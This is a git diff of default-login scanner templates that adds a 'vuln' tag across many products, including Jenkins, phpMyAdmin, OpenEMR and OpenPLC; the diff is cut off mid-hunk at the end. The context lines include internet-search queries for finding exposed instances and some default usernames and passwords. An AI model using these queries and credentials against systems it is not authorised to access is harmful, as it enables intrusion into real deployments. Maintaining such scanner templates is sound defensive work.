a/http/default-logins/jboss/jboss-jbpm-default-login.yaml +++ b/http/default-logins/jboss/jboss-jbpm-default-login.yaml @@ -18,7 +18,7 @@ info: shodan-query: html:"JBossWS" product: jbpm vendor: redhat - tags: jboss,jbpm,default-login + tags: jboss,jbpm,default-login,vuln http: - raw: diff --git a/http/default-logins/jboss/jmx-default-login.yaml b/http/default-logins/jboss/jmx-default-login.yaml index a4eed81fa99..b65bcb67507 100644 --- a/http/default-logins/jboss/jmx-default-login.yaml +++ b/http/default-logins/jboss/jmx-default-login.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-522 metadata: max-request: 28 - tags: jboss,jmx,default-login + tags: jboss,jmx,default-login,vuln http: - raw: diff --git a/http/default-logins/jeedom/jeedom-default-login.yaml b/http/default-logins/jeedom/jeedom-default-login.yaml index b9c61113a3e..a1bbb532a96 100644 --- a/http/default-logins/jeedom/jeedom-default-login.yaml +++ b/http/default-logins/jeedom/jeedom-default-login.yaml @@ -14,7 +14,7 @@ info: vendor: jeedom product: jeedom shodan-query: title:"Jeedom" - tags: jeedom,default-login,misconfig + tags: jeedom,default-login,misconfig,vuln variables: username: admin password: admin diff --git a/http/default-logins/jellyfin/jellyfin-default-login.yaml b/http/default-logins/jellyfin/jellyfin-default-login.yaml index 89ef0a65b61..73ea16aecda 100644 --- a/http/default-logins/jellyfin/jellyfin-default-login.yaml +++ b/http/default-logins/jellyfin/jellyfin-default-login.yaml @@ -15,7 +15,7 @@ info: fofa-query: title="Jellyfin" product: jellyfin vendor: jellyfin - tags: default-login,jellyfin,misconfig + tags: default-login,jellyfin,misconfig,vuln http: - raw: diff --git a/http/default-logins/jenkins/jenkins-default.yaml b/http/default-logins/jenkins/jenkins-default.yaml index d2ce0956b21..111a506bfda 100644 --- a/http/default-logins/jenkins/jenkins-default.yaml +++ b/http/default-logins/jenkins/jenkins-default.yaml @@ -20,7 +20,7 @@ info: - x-jenkins - title:"Jenkins" max-request: 3 - tags: jenkins,default-login + tags: jenkins,default-login,vuln http: - raw: diff --git a/http/default-logins/jinher/jinher-oa-default-login.yaml b/http/default-logins/jinher/jinher-oa-default-login.yaml index cd1dc0c44c6..3149facaed9 100644 --- a/http/default-logins/jinher/jinher-oa-default-login.yaml +++ b/http/default-logins/jinher/jinher-oa-default-login.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-522 metadata: max-request: 1 - tags: jinher,default-login + tags: jinher,default-login,vuln http: - raw: diff --git a/http/default-logins/joplin/joplin-default-login.yaml b/http/default-logins/joplin/joplin-default-login.yaml index b612928f129..c1ef73f56d9 100644 --- a/http/default-logins/joplin/joplin-default-login.yaml +++ b/http/default-logins/joplin/joplin-default-login.yaml @@ -10,7 +10,7 @@ info: verified: true shodan-query: 'title:"Joplin Server"' max-request: 1 - tags: joplin,oss,default-login + tags: joplin,oss,default-login,vuln variables: username: admin@localhost diff --git a/http/default-logins/jupyterhub/jupyterhub-default-login.yaml b/http/default-logins/jupyterhub/jupyterhub-default-login.yaml index 1cdea15693c..f1a78f49118 100644 --- a/http/default-logins/jupyterhub/jupyterhub-default-login.yaml +++ b/http/default-logins/jupyterhub/jupyterhub-default-login.yaml @@ -17,7 +17,7 @@ info: shodan-query: http.title:"JupyterHub" product: jupyterhub vendor: jupyter - tags: jupyterhub,default-login + tags: jupyterhub,default-login,vuln http: - raw: diff --git a/http/default-logins/kanboard-default-login.yaml b/http/default-logins/kanboard-default-login.yaml index ba29f89ce17..94863eff251 100644 --- a/http/default-logins/kanboard-default-login.yaml +++ b/http/default-logins/kanboard-default-login.yaml @@ -20,7 +20,7 @@ info: fofa-query: app="Kanboard" product: kanboard vendor: kanboard - tags: default-login,kanboard + tags: default-login,kanboard,vuln http: - raw: diff --git a/http/default-logins/kettle/kettle-default-login.yaml b/http/default-logins/kettle/kettle-default-login.yaml index e6c22ff55e2..7d82516564e 100644 --- a/http/default-logins/kettle/kettle-default-login.yaml +++ b/http/default-logins/kettle/kettle-default-login.yaml @@ -13,7 +13,7 @@ info: verified: true max-request: 1 shodan-query: basic realm="Kettle" - tags: default-login,kettle + tags: default-login,kettle,vuln http: - raw: diff --git a/http/default-logins/klog-server-default-login.yaml b/http/default-logins/klog-server-default-login.yaml index 929e99f2242..0f7207554f4 100644 --- a/http/default-logins/klog-server-default-login.yaml +++ b/http/default-logins/klog-server-default-login.yaml @@ -12,7 +12,7 @@ info: max-request: 2 vendor: klogserver product: klog_server - tags: default-login,klog-server + tags: default-login,klog-server,vuln http: - raw: diff --git a/http/default-logins/leostream/leostream-default-login.yaml b/http/default-logins/leostream/leostream-default-login.yaml index c6683c6bc71..62f637a926f 100644 --- a/http/default-logins/leostream/leostream-default-login.yaml +++ b/http/default-logins/leostream/leostream-default-login.yaml @@ -17,7 +17,7 @@ info: shodan-query: http.title:"Leostream" product: connection_broker vendor: leostream - tags: leostream,default-login + tags: leostream,default-login,vuln http: - raw: diff --git a/http/default-logins/loytec/loytec-default-password.yaml b/http/default-logins/loytec/loytec-default-password.yaml index 5ff66a68615..dfde1d32815 100644 --- a/http/default-logins/loytec/loytec-default-password.yaml +++ b/http/default-logins/loytec/loytec-default-password.yaml @@ -9,7 +9,7 @@ info: metadata: verifed: true max-request: 1 - tags: loytec,default-login + tags: loytec,default-login,vuln variables: username: admin diff --git a/http/default-logins/lucee/lucee-default-login.yaml b/http/default-logins/lucee/lucee-default-login.yaml index e57e145cfe0..dfa1e7d791d 100644 --- a/http/default-logins/lucee/lucee-default-login.yaml +++ b/http/default-logins/lucee/lucee-default-login.yaml @@ -15,7 +15,7 @@ info: max-request: 1 shodan-query: "html:\"Lucee\"" fofa-query: "app=\"Lucee-Engine\"" - tags: lucee,default-login + tags: lucee,default-login,vuln http: - raw: diff --git a/http/default-logins/lutron/lutron-default-login.yaml b/http/default-logins/lutron/lutron-default-login.yaml index e2079c00888..11e0d2f37c9 100644 --- a/http/default-logins/lutron/lutron-default-login.yaml +++ b/http/default-logins/lutron/lutron-default-login.yaml @@ -14,7 +14,7 @@ info: cwe-id: CWE-1391 metadata: max-request: 1 - tags: default-login,lutron,iot + tags: default-login,lutron,iot,vuln http: - method: GET diff --git a/http/default-logins/magnolia-default-login.yaml b/http/default-logins/magnolia-default-login.yaml index 7bcd1161770..aac0dc01cfd 100644 --- a/http/default-logins/magnolia-default-login.yaml +++ b/http/default-logins/magnolia-default-login.yaml @@ -18,7 +18,7 @@ info: shodan-query: html:"Magnolia is a registered trademark" product: magnolia_cms vendor: magnolia-cms - tags: magnolia,default-login + tags: magnolia,default-login,vuln http: - raw: diff --git a/http/default-logins/magnusbilling/magnusbilling-default-login.yaml b/http/default-logins/magnusbilling/magnusbilling-default-login.yaml index 73f9b2a0b23..a2547ba08a9 100644 --- a/http/default-logins/magnusbilling/magnusbilling-default-login.yaml +++ b/http/default-logins/magnusbilling/magnusbilling-default-login.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: html:"MagnusBilling" - tags: mbilling,default-login + tags: mbilling,default-login,vuln variables: username: "root" diff --git a/http/default-logins/mantisbt/mantisbt-anonymous-login.yaml b/http/default-logins/mantisbt/mantisbt-anonymous-login.yaml index 68f85288943..1a1e52adc7d 100644 --- a/http/default-logins/mantisbt/mantisbt-anonymous-login.yaml +++ b/http/default-logins/mantisbt/mantisbt-anonymous-login.yaml @@ -14,7 +14,7 @@ info: vendor: mantisbt product: mantisbt shodan-query: http.favicon.hash:662709064 - tags: default-logins,anonymous,mantisbt,default-login + tags: default-logins,anonymous,mantisbt,default-login,vuln http: - method: GET diff --git a/http/default-logins/mantisbt/mantisbt-default-credential.yaml b/http/default-logins/mantisbt/mantisbt-default-credential.yaml index a0425305a25..56d1030274c 100644 --- a/http/default-logins/mantisbt/mantisbt-default-credential.yaml +++ b/http/default-logins/mantisbt/mantisbt-default-credential.yaml @@ -17,7 +17,7 @@ info: shodan-query: title:"MantisBT" product: mantisbt vendor: mantisbt - tags: mantisbt,default-login + tags: mantisbt,default-login,vuln http: - raw: diff --git a/http/default-logins/minio/minio-default-login.yaml b/http/default-logins/minio/minio-default-login.yaml index 042fa856467..351cf4e9e3d 100644 --- a/http/default-logins/minio/minio-default-login.yaml +++ b/http/default-logins/minio/minio-default-login.yaml @@ -18,7 +18,7 @@ info: shodan-query: http.html:"symfony Profiler" product: minio vendor: minio - tags: default-login,minio + tags: default-login,minio,vuln http: - raw: diff --git a/http/default-logins/mitel/mitel-6000-default-login.yaml b/http/default-logins/mitel/mitel-6000-default-login.yaml index d3f3825d03b..d537f6f640e 100644 --- a/http/default-logins/mitel/mitel-6000-default-login.yaml +++ b/http/default-logins/mitel/mitel-6000-default-login.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: "Server: Aragorn Mitel" - tags: mitel,mitel-6000,default-login + tags: mitel,mitel-6000,default-login,vuln variables: username: "admin" diff --git a/http/default-logins/mobotix/mobotix-default-login.yaml b/http/default-logins/mobotix/mobotix-default-login.yaml index 1461feb3b93..7cf349480cd 100644 --- a/http/default-logins/mobotix/mobotix-default-login.yaml +++ b/http/default-logins/mobotix/mobotix-default-login.yaml @@ -15,7 +15,7 @@ info: shodan-query: title:"Mobotix" product: s14 vendor: mobotix - tags: mobotix,default-login,webcam,iot + tags: mobotix,default-login,webcam,iot,vuln http: - raw: diff --git a/http/default-logins/mofi/mofi4500-default-login.yaml b/http/default-logins/mofi/mofi4500-default-login.yaml index 6e59e6ee376..9b74e2ed527 100644 --- a/http/default-logins/mofi/mofi4500-default-login.yaml +++ b/http/default-logins/mofi/mofi4500-default-login.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-522 metadata: max-request: 1 - tags: mofi,default-login + tags: mofi,default-login,vuln http: - raw: diff --git a/http/default-logins/molgenis/molgenis-default-login.yaml b/http/default-logins/molgenis/molgenis-default-login.yaml index f13e789f990..6579cda816b 100644 --- a/http/default-logins/molgenis/molgenis-default-login.yaml +++ b/http/default-logins/molgenis/molgenis-default-login.yaml @@ -13,7 +13,7 @@ info: verified: true max-request: 1 shodan-query: html:"MOLGENIS" - tags: molgenis,default-login,exposure + tags: molgenis,default-login,exposure,vuln variables: username: 'admin' diff --git a/http/default-logins/nacos/nacos-default-login.yaml b/http/default-logins/nacos/nacos-default-login.yaml index 5511f756cd7..8c23c1ccf47 100644 --- a/http/default-logins/nacos/nacos-default-login.yaml +++ b/http/default-logins/nacos/nacos-default-login.yaml @@ -14,7 +14,7 @@ info: vendor: alibaba product: nacos fofa-query: title=="Nacos" - tags: nacos,default-login,alibaba + tags: nacos,default-login,alibaba,vuln http: - raw: diff --git a/http/default-logins/nagios/nagios-default-login.yaml b/http/default-logins/nagios/nagios-default-login.yaml index e17358e59e5..1379d54c4fb 100644 --- a/http/default-logins/nagios/nagios-default-login.yaml +++ b/http/default-logins/nagios/nagios-default-login.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-522 metadata: max-request: 2 - tags: nagios,default-login + tags: nagios,default-login,vuln http: - raw: diff --git a/http/default-logins/nagios/nagiosxi-default-login.yaml b/http/default-logins/nagios/nagiosxi-default-login.yaml index d354a4a21fa..5008e3bfb18 100644 --- a/http/default-logins/nagios/nagiosxi-default-login.yaml +++ b/http/default-logins/nagios/nagiosxi-default-login.yaml @@ -18,7 +18,7 @@ info: shodan-query: title:"Nagios XI" product: nagios_xi vendor: nagios - tags: nagios,nagiosxi,default-login + tags: nagios,nagiosxi,default-login,vuln http: - raw: diff --git a/http/default-logins/netdisco/netdisco-default-login.yaml b/http/default-logins/netdisco/netdisco-default-login.yaml index c8213f79c06..b4e59c23a13 100644 --- a/http/default-logins/netdisco/netdisco-default-login.yaml +++ b/http/default-logins/netdisco/netdisco-default-login.yaml @@ -15,7 +15,7 @@ info: max-request: 1 shodan-query: title:"Netdisco" fofa-query: title="Netdisco" - tags: netdisco,default-login + tags: netdisco,default-login,vuln variables: username: "netdisco" diff --git a/http/default-logins/netflow/netflow-default-login.yaml b/http/default-logins/netflow/netflow-default-login.yaml index 6120a3675c4..d089f5234d5 100644 --- a/http/default-logins/netflow/netflow-default-login.yaml +++ b/http/default-logins/netflow/netflow-default-login.yaml @@ -14,7 +14,7 @@ info: vendor: zohocorp product: manageengine_netflow_analyzer shodan-query: html:"Login - Netflow Analyzer" - tags: default-login,netflow,misconfig + tags: default-login,netflow,misconfig,vuln http: - raw: diff --git a/http/default-logins/netsus/netsus-default-login.yaml b/http/default-logins/netsus/netsus-default-login.yaml index cfc8318a93d..af24574d16a 100644 --- a/http/default-logins/netsus/netsus-default-login.yaml +++ b/http/default-logins/netsus/netsus-default-login.yaml @@ -12,7 +12,7 @@ info: metadata: max-request: 1 shodan-query: http.title:"NetSUS Server Login" - tags: netsus,default-login + tags: netsus,default-login,vuln http: - raw: diff --git a/http/default-logins/next-terminal/next-terminal-default-login.yaml b/http/default-logins/next-terminal/next-terminal-default-login.yaml index bf0886f0162..d6a9a6c6e5b 100644 --- a/http/default-logins/next-terminal/next-terminal-default-login.yaml +++ b/http/default-logins/next-terminal/next-terminal-default-login.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 fofa-query: title="Next Terminal" - tags: default-login,next-terminal,next + tags: default-login,next-terminal,next,vuln http: - raw: diff --git a/http/default-logins/nexus/nexus-default-login.yaml b/http/default-logins/nexus/nexus-default-login.yaml index dae4e9bec41..af2c04c8c60 100644 --- a/http/default-logins/nexus/nexus-default-login.yaml +++ b/http/default-logins/nexus/nexus-default-login.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-522 metadata: max-request: 1 - tags: nexus,default-login + tags: nexus,default-login,vuln http: - raw: diff --git a/http/default-logins/nginx/nginx-proxy-manager-default-login.yaml b/http/default-logins/nginx/nginx-proxy-manager-default-login.yaml index b2dded24c33..3e3af3d507a 100644 --- a/http/default-logins/nginx/nginx-proxy-manager-default-login.yaml +++ b/http/default-logins/nginx/nginx-proxy-manager-default-login.yaml @@ -10,7 +10,7 @@ info: shodan-query: html:"Nginx Proxy Manager" verified: true max-request: 1 - tags: nginx,proxy-manager,default-login + tags: nginx,proxy-manager,default-login,vuln http: - raw: diff --git a/http/default-logins/nocobase/nocobase-default-login.yaml b/http/default-logins/nocobase/nocobase-default-login.yaml index dfb268ff719..ec837215664 100644 --- a/http/default-logins/nocobase/nocobase-default-login.yaml +++ b/http/default-logins/nocobase/nocobase-default-login.yaml @@ -14,7 +14,7 @@ info: verified: true max-request: 2 zoomeye-query: app="NocoBase" - tags: default-login,nocobase + tags: default-login,nocobase,vuln variables: username: "admin@nocobase.com" diff --git a/http/default-logins/node-red/nodered-default-login.yaml b/http/default-logins/node-red/nodered-default-login.yaml index ac76498df76..9bbbdeac6a8 100644 --- a/http/default-logins/node-red/nodered-default-login.yaml +++ b/http/default-logins/node-red/nodered-default-login.yaml @@ -16,7 +16,7 @@ info: vendor: nodered product: node-red shodan-query: http.favicon.hash:321591353 - tags: default-login,node-red,dashboard + tags: default-login,node-red,dashboard,vuln http: - raw: diff --git a/http/default-logins/nps/nps-default-login.yaml b/http/default-logins/nps/nps-default-login.yaml index 32331d2d97c..3d74252e74c 100644 --- a/http/default-logins/nps/nps-default-login.yaml +++ b/http/default-logins/nps/nps-default-login.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-522 metadata: max-request: 1 - tags: nps,default-login + tags: nps,default-login,vuln http: - raw: diff --git a/http/default-logins/nsicg/nsicg-default-login.yaml b/http/default-logins/nsicg/nsicg-default-login.yaml index 0f315b7a2f0..0e92a608a7e 100644 --- a/http/default-logins/nsicg/nsicg-default-login.yaml +++ b/http/default-logins/nsicg/nsicg-default-login.yaml @@ -19,7 +19,7 @@ info: fofa-query: "NS-ICG" product: application_security_gateway vendor: netentsec - tags: nsicg,default-login + tags: nsicg,default-login,vuln http: - raw: diff --git a/http/default-logins/nti/enviromuux-default-login.yaml b/http/default-logins/nti/enviromuux-default-login.yaml index e56c5a03f8f..bc461649ea9 100644 --- a/http/default-logins/nti/enviromuux-default-login.yaml +++ b/http/default-logins/nti/enviromuux-default-login.yaml @@ -14,7 +14,7 @@ info: max-request: 1 shodan-query: html:"ENVIROMUX" fofa-query: body="ENVIROMUX" - tags: default-login,networktechnologies,enviromux + tags: default-login,networktechnologies,enviromux,vuln variables: username: "root" diff --git a/http/default-logins/nuuo-nvr-default-login.yaml b/http/default-logins/nuuo-nvr-default-login.yaml index 6f0c7d4c00e..4de29e98f3c 100644 --- a/http/default-logins/nuuo-nvr-default-login.yaml +++ b/http/default-logins/nuuo-nvr-default-login.yaml @@ -13,7 +13,7 @@ info: max-request: 1 shodan-query: title:"NUUO" fofa-query: title="NUUO" - tags: nuuo,nvr,default-login,misconfig + tags: nuuo,nvr,default-login,misconfig,vuln variables: username: admin diff --git a/http/default-logins/o2oa/o2oa-default-login.yaml b/http/default-logins/o2oa/o2oa-default-login.yaml index 5679dcb0ead..b37a8ccacc8 100755 --- a/http/default-logins/o2oa/o2oa-default-login.yaml +++ b/http/default-logins/o2oa/o2oa-default-login.yaml @@ -14,7 +14,7 @@ info: vendor: zoneland product: o2oa shodan-query: title=="O2OA" - tags: o2oa,default-login + tags: o2oa,default-login,vuln http: - raw: diff --git a/http/default-logins/octobercms/octobercms-default-login.yaml b/http/default-logins/octobercms/octobercms-default-login.yaml index 7eef92e03a4..f9a52e9a6d9 100644 --- a/http/default-logins/octobercms/octobercms-default-login.yaml +++ b/http/default-logins/octobercms/octobercms-default-login.yaml @@ -19,7 +19,7 @@ info: shodan-query: http.component:"October CMS" product: october vendor: octobercms - tags: octobercms,default-login,oss + tags: octobercms,default-login,oss,vuln http: - raw: diff --git a/http/default-logins/ofbiz/ofbiz-default-login.yaml b/http/default-logins/ofbiz/ofbiz-default-login.yaml index ea6cc9a2ce7..e00f6a1e65e 100644 --- a/http/default-logins/ofbiz/ofbiz-default-login.yaml +++ b/http/default-logins/ofbiz/ofbiz-default-login.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-522 metadata: max-request: 1 - tags: ofbiz,default-login,apache + tags: ofbiz,default-login,apache,vuln http: - raw: diff --git a/http/default-logins/openemr/openemr-default-login.yaml b/http/default-logins/openemr/openemr-default-login.yaml index 4d61e9ae519..9391420d8bb 100644 --- a/http/default-logins/openemr/openemr-default-login.yaml +++ b/http/default-logins/openemr/openemr-default-login.yaml @@ -18,7 +18,7 @@ info: fofa-query: app="OpenEMR" product: openemr vendor: open-emr - tags: openemr,default-login + tags: openemr,default-login,vuln http: - raw: diff --git a/http/default-logins/openmediavault/openmediavault-default-login.yaml b/http/default-logins/openmediavault/openmediavault-default-login.yaml index 9d08c4d885b..ce350200b0f 100644 --- a/http/default-logins/openmediavault/openmediavault-default-login.yaml +++ b/http/default-logins/openmediavault/openmediavault-default-login.yaml @@ -18,7 +18,7 @@ info: shodan-query: title:"OpenMediaVault" product: openmediavault vendor: openmediavault - tags: default-login,openmediavault + tags: default-login,openmediavault,vuln http: - raw: diff --git a/http/default-logins/openmetadata/openmetadata-default-login.yaml b/http/default-logins/openmetadata/openmetadata-default-login.yaml index 4d03148e08d..658e2840858 100644 --- a/http/default-logins/openmetadata/openmetadata-default-login.yaml +++ b/http/default-logins/openmetadata/openmetadata-default-login.yaml @@ -16,7 +16,7 @@ info: product: openmetadata fofa-query: title="OpenMetadata" shodan-query: title:"OpenMetadata" - tags: openmetadata,default-login,misconfig + tags: openmetadata,default-login,misconfig,vuln variables: username: admin@open-metadata.org diff --git a/http/default-logins/openplc/openplc-default-login.yaml b/http/default-logins/openplc/openplc-default-login.yaml index 553818bd582..ab4c269ec14 100644 --- a/http/default-logins/openplc/openplc-default-login.yaml +++ b/http/default-logins/openplc/openplc-default-login.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 2 shodan-query: html:"OpenPLC" - tags: openplc,default-login,iot + tags: openplc,default-login,iot,vuln variables: username: "openplc" diff --git a/http/default-logins/opensearch-default-login.yaml b/http/default-logins/opensearch-default-login.yaml index abd57600617..619762a02c2 100644 --- a/http/default-logins/opensearch-default-login.yaml +++ b/http/default-logins/opensearch-default-login.yaml @@ -14,7 +14,7 @@ info: max-request: 1 shodan-query: title:"OpenSearch" fofa-query: title="OpenSearch" - tags: opensearch,default-login,misconfig + tags: opensearch,default-login,misconfig,vuln variables: username: admin diff --git a/http/default-logins/oracle/businessintelligence-default-login.yaml b/http/default-logins/oracle/businessintelligence-default-login.yaml index 1aa1a1ffcba..760d9fff948 100644 --- a/http/default-logins/oracle/businessintelligence-default-login.yaml +++ b/http/default-logins/oracle/businessintelligence-default-login.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-522 metadata: max-request: 1 - tags: oracle,default-login + tags: oracle,default-login,vuln http: - raw: diff --git a/http/default-logins/oracle/peoplesoft-default-login.yaml b/http/default-logins/oracle/peoplesoft-default-login.yaml index d8d02b95ac7..4bec9c952ee 100644 --- a/http/default-logins/oracle/peoplesoft-default-login.yaml +++ b/http/default-logins/oracle/peoplesoft-default-login.yaml @@ -19,7 +19,7 @@ info: shodan-query: title:"Oracle PeopleSoft Sign-in" product: peoplesoft_enterprise_peopletools vendor: oracle - tags: default-login,peoplesoft,oracle,fuzz + tags: default-login,peoplesoft,oracle,fuzz,vuln http: - method: POST diff --git a/http/default-logins/osasi/osasi-default-login.yaml b/http/default-logins/osasi/osasi-default-login.yaml index 7672d65a64f..7a721f63fa1 100644 --- a/http/default-logins/osasi/osasi-default-login.yaml +++ b/http/default-logins/osasi/osasi-default-login.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 1 shodan-query: http.favicon.hash:-268676052 - tags: osasi,plc,default-login + tags: osasi,plc,default-login,vuln http: - raw: diff --git a/http/default-logins/others/aruba-instant-default-login.yaml b/http/default-logins/others/aruba-instant-default-login.yaml index d5542a0ffd9..6451ba64517 100755 --- a/http/default-logins/others/aruba-instant-default-login.yaml +++ b/http/default-logins/others/aruba-instant-default-login.yaml @@ -16,7 +16,7 @@ info: vendor: arubanetworks product: aruba_instant fofa-query: body="jscripts/third_party/raphael-treemap.min.js" || body="jscripts/third_party/highcharts.src.js" - tags: aruba,default-login + tags: aruba,default-login,vuln http: - raw: diff --git a/http/default-logins/others/ciphertrust-default-login.yaml b/http/default-logins/others/ciphertrust-default-login.yaml index 1488a2e69cd..4b411983dff 100755 --- a/http/default-logins/others/ciphertrust-default-login.yaml +++ b/http/default-logins/others/ciphertrust-default-login.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 fofa-query: cert="Ciphertrust" || fid="yHV5+ZZGMu0=" - tags: default-login,ciphertrust + tags: default-login,ciphertrust,vuln http: - raw: diff --git a/http/default-logins/others/cnzxsoft-default-login.yaml b/http/default-logins/others/cnzxsoft-default-login.yaml index be8b7b9be07..e3e0b15dcb2 100755 --- a/http/default-logins/others/cnzxsoft-default-login.yaml +++ b/http/default-logins/others/cnzxsoft-default-login.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 1 fofa-query: 'title=="中新金盾信息安全管理系统"' - tags: default-login,cnzxsoft + tags: default-login,cnzxsoft,vuln http: - raw: diff --git a/http/default-logins/others/inspur-clusterengine-default-login.yaml b/http/default-logins/others/inspur-clusterengine-default-login.yaml index d4d4baa214c..54a374e90f3 100644 --- a/http/default-logins/others/inspur-clusterengine-default-login.yaml +++ b/http/default-logins/others/inspur-clusterengine-default-login.yaml @@ -14,7 +14,7 @@ info: vendor: inspur product: clusterengine fofa-query: title="TSCEV4.0" - tags: default-login,inspur,clusterengine + tags: default-login,inspur,clusterengine,vuln http: - raw: diff --git a/http/default-logins/others/kingsoft-v8-default-login.yaml b/http/default-logins/others/kingsoft-v8-default-login.yaml index f11dc65f523..dc0fd4329e9 100644 --- a/http/default-logins/others/kingsoft-v8-default-login.yaml +++ b/http/default-logins/others/kingsoft-v8-default-login.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-522 metadata: max-request: 1 - tags: kingsoft,default-login + tags: kingsoft,default-login,vuln http: - raw: diff --git a/http/default-logins/others/opencats-default-login.yaml b/http/default-logins/others/opencats-default-login.yaml index 5682d202d45..0a52c647de7 100644 --- a/http/default-logins/others/opencats-default-login.yaml +++ b/http/default-logins/others/opencats-default-login.yaml @@ -16,7 +16,7 @@ info: shodan-query: title:"opencats" product: opencats vendor: opencats - tags: default-login,opencats + tags: default-login,opencats,vuln http: - raw: diff --git a/http/default-logins/others/panabit-ixcache-default-login.yaml b/http/default-logins/others/panabit-ixcache-default-login.yaml index f056a6ec838..2b5e503f6fc 100644 --- a/http/default-logins/others/panabit-ixcache-default-login.yaml +++ b/http/default-logins/others/panabit-ixcache-default-login.yaml @@ -9,7 +9,7 @@ info: - http://forum.panabit.com/thread-10830-1-1.html metadata: max-request: 1 - tags: default-login,ixcache,panabit + tags: default-login,ixcache,panabit,vuln http: - raw: diff --git a/http/default-logins/others/secnet-ac-default-login.yaml b/http/default-logins/others/secnet-ac-default-login.yaml index 55f0c1f5c7d..1fc4046105f 100644 --- a/http/default-logins/others/secnet-ac-default-login.yaml +++ b/http/default-logins/others/secnet-ac-default-login.yaml @@ -9,7 +9,7 @@ info: - https://bbs.secnet.cn/post/t-30 metadata: max-request: 1 - tags: default-login,secnet + tags: default-login,secnet,vuln http: - raw: diff --git a/http/default-logins/others/supershell-default-login.yaml b/http/default-logins/others/supershell-default-login.yaml index 1ca63ac4152..8a61c58707d 100644 --- a/http/default-logins/others/supershell-default-login.yaml +++ b/http/default-logins/others/supershell-default-login.yaml @@ -13,7 +13,7 @@ info: verified: true max-request: 1 fofa-query: title="supershell" - tags: supershell,default-login + tags: supershell,default-login,vuln http: - raw: diff --git a/http/default-logins/others/telecom-gateway-default-login.yaml b/http/default-logins/others/telecom-gateway-default-login.yaml index 4146793ee52..698faf9d3de 100644 --- a/http/default-logins/others/telecom-gateway-default-login.yaml +++ b/http/default-logins/others/telecom-gateway-default-login.yaml @@ -7,7 +7,7 @@ info: description: Telecom Gateway default admin login credentials were successful. metadata: max-request: 1 - tags: default-login,telecom,gateway + tags: default-login,telecom,gateway,vuln http: - raw: diff --git a/http/default-logins/paloalto/panos-default-login.yaml b/http/default-logins/paloalto/panos-default-login.yaml index dfed3e76089..8764fbdf8af 100644 --- a/http/default-logins/paloalto/panos-default-login.yaml +++ b/http/default-logins/paloalto/panos-default-login.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-522 metadata: max-request: 1 - tags: panos,default-login + tags: panos,default-login,vuln http: - raw: diff --git a/http/default-logins/panabit/panabit-default-login.yaml b/http/default-logins/panabit/panabit-default-login.yaml index 6dc759585bb..62f8a02b0cd 100644 --- a/http/default-logins/panabit/panabit-default-login.yaml +++ b/http/default-logins/panabit/panabit-default-login.yaml @@ -17,7 +17,7 @@ info: verified: true max-request: 1 fofa-query: app="Panabit-智能网关" - tags: panabit,default-login,intrusive + tags: panabit,default-login,intrusive,vuln http: - raw: diff --git a/http/default-logins/pcoweb/pcoweb-default-login.yaml b/http/default-logins/pcoweb/pcoweb-default-login.yaml index c08ed928e28..97f0df05afb 100644 --- a/http/default-logins/pcoweb/pcoweb-default-login.yaml +++ b/http/default-logins/pcoweb/pcoweb-default-login.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 1 shodan-query: title:"pCOWeb" - tags: pcoweb,default-login,misconfig + tags: pcoweb,default-login,misconfig,vuln variables: username: "admin" diff --git a/http/default-logins/pensando/pensando-default-login.yaml b/http/default-logins/pensando/pensando-default-login.yaml index bce1a06d45d..473b644b7d2 100644 --- a/http/default-logins/pensando/pensando-default-login.yaml +++ b/http/default-logins/pensando/pensando-default-login.yaml @@ -12,7 +12,7 @@ info: metadata: verified: true fofa-query: icon_hash="1907840597" - tags: pensando,default-login + tags: pensando,default-login,vuln variables: username: 'admin' diff --git a/http/default-logins/pentaho/pentaho-default-login.yaml b/http/default-logins/pentaho/pentaho-default-login.yaml index 145d1536e28..1b394d87f6c 100644 --- a/http/default-logins/pentaho/pentaho-default-login.yaml +++ b/http/default-logins/pentaho/pentaho-default-login.yaml @@ -16,7 +16,7 @@ info: shodan-query: pentaho product: vantara_pentaho vendor: hitachi - tags: pentaho,default-login + tags: pentaho,default-login,vuln http: - raw: diff --git a/http/default-logins/photoprism-default-login.yaml b/http/default-logins/photoprism-default-login.yaml index 71b3ecd6b34..e47609b1df7 100644 --- a/http/default-logins/photoprism-default-login.yaml +++ b/http/default-logins/photoprism-default-login.yaml @@ -13,7 +13,7 @@ info: max-request: 2 shodan-query: title:"PhotoPrism" fofa-query: title="PhotoPrism" - tags: photoprism,default-login,misconfig + tags: photoprism,default-login,misconfig,vuln variables: username: admin diff --git a/http/default-logins/phpmyadmin/phpmyadmin-default-login.yaml b/http/default-logins/phpmyadmin/phpmyadmin-default-login.yaml index 62561caa195..e6c652e936c 100644 --- a/http/default-logins/phpmyadmin/phpmyadmin-default-login.yaml +++ b/http/default-logins/phpmyadmin/phpmyadmin-default-login.yaml @@ -18,7 +18,7 @@ info: shodan-query: http.title:phpMyAdmin product: phpmyadmin vendor: phpmyadmin - tags: default-login,phpmyadmin + tags: default-login,phpmyadmin,vuln http: - raw: diff --git a/http/default-logins/powerjob-default-login.yaml b/http/default-logins/powerjob-default-login.yaml index 481deb6c0cc..1bb2898d3a6 100644 --- a/http/default-logins/powerjob-default-login.yaml +++ b/http/default-logins/powerjob-default-login.yaml @@ -17,7 +17,7 @@ info: product: powerjob shodan-query: http.title:"PowerJob" fofa-query: title="PowerJob" - tags: powerjob,default-login + tags: powerjob,default-login,vuln http: - raw: diff --git a/http/default-logins/powershell/powershell-default-login.yaml b/http/default-logins/powershell/powershell-default-login.yaml index 3da30c62e84..b5272bafad5 100644 --- a/http/default-logins/powershell/powershell-default-login.yaml +++ 